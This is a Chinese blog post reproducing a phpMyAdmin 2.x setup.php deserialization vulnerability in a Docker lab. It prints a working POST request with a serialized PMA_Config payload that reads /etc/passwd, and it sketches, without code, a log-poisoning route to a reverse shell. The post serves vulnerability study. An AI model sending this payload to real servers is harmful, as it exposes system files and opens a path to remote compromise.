学习phpMyAdminscripts:setup.php反序列化漏洞

信息安全不简单鸭 2024-08-02 20:30:35

phpMyadmin是一套开源的、基于Web的Mysql数据库管理工具。这个实验利用php的反序列化实现了任意文件读取,影响的版本是phpMyAdmin 2.x,然鹅,令人激动的是网上有师傅分享了利用该漏洞实现了反弹shell,思路是先访问出错,让access.log或者error.log记录出错信息,然后在利用反序列化读取access.log或者error.log文件中的代码,实现反弹shell,心动不如行动~

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

前提:准备好docker环境,下载好书籍配套实验环境,进入目录 ,开始复现漏洞

docker-compose build //可选docker-compose up -d

完成试验后,记得删除漏洞环境哦~~

docker-compose downdocker system prune -a -f //可选

简单访问一下,说明phpMyAdmin scripts:setup.php 反序列化漏洞(WooYun-2016-199433)环境搭建成功了

掏出burpsuite准备发一个POST请求,获取etc目录下的passwd文件内容

POST /scripts/setup.php HTTP/1.1Host: 144.34.162.13:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 80action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

由于这个实验中,无法记录请求,因此,就没有继续复现反弹shell了

0 阅读:1

信息安全不简单鸭

简介:感谢大家的关注